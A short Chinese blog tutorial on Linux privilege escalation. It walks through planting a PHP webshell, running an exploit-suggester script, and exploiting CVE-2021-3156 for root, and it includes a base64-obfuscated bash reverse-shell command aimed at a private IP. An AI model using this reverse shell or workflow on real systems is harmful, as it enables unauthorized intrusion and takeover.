前言

实际环境中会遇到过很多有shell但是权限不够的情况，那么对于我这种对内核提权的知识只存在脏牛提权的懒狗来说，最方便快捷的方式就是拿脚本来批量看当前版本的内核有哪些可以利用的脚本

正文

先搭建个环境

在php环境里写个一句话

拿蚁剑连接

虚拟终端运行，查看权限

上传自动根据内核看提权的脚本

1github:https://github.com/mzet-/linux-exploit-suggester

通过一句话木马上传该.sh文件

赋7权限，可执行

操作完毕后，在蚁剑的虚拟终端中执行脚本

可以看到当前版本的内核有挺多可以利用的漏洞的，我这里挑一个CVE-2021-3156演示

使用命令反弹一个shell回来

1echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNDAuMTI5LzQ0NDQgMD4mMQ== | base64,-d | bash,-i

下载地址

1https://codeload.github.com/blasty/CVE-2021-3156/zip/main

下载完后，还是通过一句话木马上传上去

ubuntu系统一般都是自带python的，所以上传上去后，直接执行，可以看到已经root

懒狗必备傻瓜式脚本

原文始发于微信公众号（E条咸鱼）：Linux提权脚本